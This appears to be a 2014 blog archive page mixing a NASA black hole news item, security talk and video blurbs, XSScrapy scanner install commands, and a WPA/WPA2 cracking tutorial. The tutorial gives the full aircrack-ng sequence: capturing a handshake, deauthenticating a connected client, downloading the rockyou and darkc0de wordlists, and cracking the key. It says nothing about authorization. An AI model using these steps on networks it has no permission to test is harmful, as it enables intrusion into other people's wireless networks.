When a security control is put in place, there is an expectation that the overall security posture will increase. Are your security controls really helping? This presentation will take the attackers view of common security controls and how they have either helped or not aided the defender in protecting its network.
Archive | September, 2014
A monster black hole lurking inside one of the tiniest galaxies ever known
The black hole is five times the mass of the one at the center of our Milky Way galaxy. It is inside one of the densest galaxies known to date — the M60-UCD1 dwarf galaxy that crams 140 million stars within a diameter of about 300 light-years, which is only 1/500th of our galaxy’s diameter.
If you lived inside this dwarf galaxy, the night sky would dazzle with at least 1 million stars visible to the naked eye. Our nighttime sky as seen from Earth’s surface shows 4,000 stars.
The finding implies there are many other compact galaxies in the universe that contain supermassive black holes. The observation also suggests dwarf galaxies may actually be the stripped remnants of larger galaxies that were torn apart during collisions with other galaxies rather than small islands of stars born in isolation.
“We don’t know of any other way you could make a black hole so big in an object this small,” said University of Utah astronomer Anil Seth, lead author of an international study of the dwarf galaxy published in Thursday’s issue of the journal Nature.
via: http://www.nasa.gov/press/2014/september/hubble-helps-find-smallest-known-galaxy-containing-a-supermassive-black-hole/
Installing XSScrapy on Kali Linux 1.0.9
Install the prerequisite python libraries, give it a URL, and watch it spider the entire site looking in every nook and cranny for XSS vulnerabilities.
apt-get install python-pip git clone https://github.com/DanMcInerney/xsscrapy cd xsscrapy pip install -r requirements.txt scrapy crawl xsscrapy -a url="http://example.com" pip install ipython
To login then scrape:
scrapy crawl xsscrapy -a url="http://example.com/login" -a user=my_username -a pw=my_password
All vulnerabilities it finds will be places in formatted-vulns.txt. Example output when it finds a vulnerable user agent header:
source: http://danmcinerney.org/xsscrapy-fast-thorough-xss-vulnerability-spider/
Wireless WPA and WPA2 Cracking Tutorial
Terminal Commands for WPA/WPA2 wireless cracking:
airmon-ng airmon-ng start wlan0 airodump-ng mon0
Press Ctrl+Z to break out of ‘airodump-ng’ after you collect the wireless access point’s BSSID and CH #.
airmon-ng stop mon0 airmon-ng start wlan0 10 airodump-ng -c 10 --bssid 00:11:50:61:18:72 -w wpadeauth-01.cap mon0
Wait and collect the WPA/WPA2 handshake when a device with the known key connects to the wireless network. Or if someone is already on the network you can “sends disassocate packets to one or more clients which are currently associated with a particular access point.”[1]
aireplay-ng aireplay-ng -0 3 -a 00:11:50:61:18:72 -c 58:55:CA:96:EE:84 mon0
Now that you have the WPA/WPA2 handshake, let’s crack it!
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/darkc0de.lst.gz gunzip darkc0de.lst.gz aircrack-ng -w darkc0de.lst -b 00:11:50:61:18:72 wpadeauth-01.cap
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/rockyou.7z 7z x rockyou.7z
Recommended cards for wireless injection with BackTrack and/or Kali:
- Alfa AWUS036H (Highly recommended and has better range)
- Alfa AWUS036NHA (Also great, less range but faster wifi connection)
[1] http://www.aircrack-ng.org/doku.php?id=deauthentication
[*] darkc0de.lst.gz
[*] rockyou.7z
The Secret Lives of Hackers
Hackers may not be who we think they are. In fact, you might be a hacker and not even know it. Learn the true meaning of hacking and some of the many reasons that hackers hack.
via: http://video.pbs.org/video/2365315329/
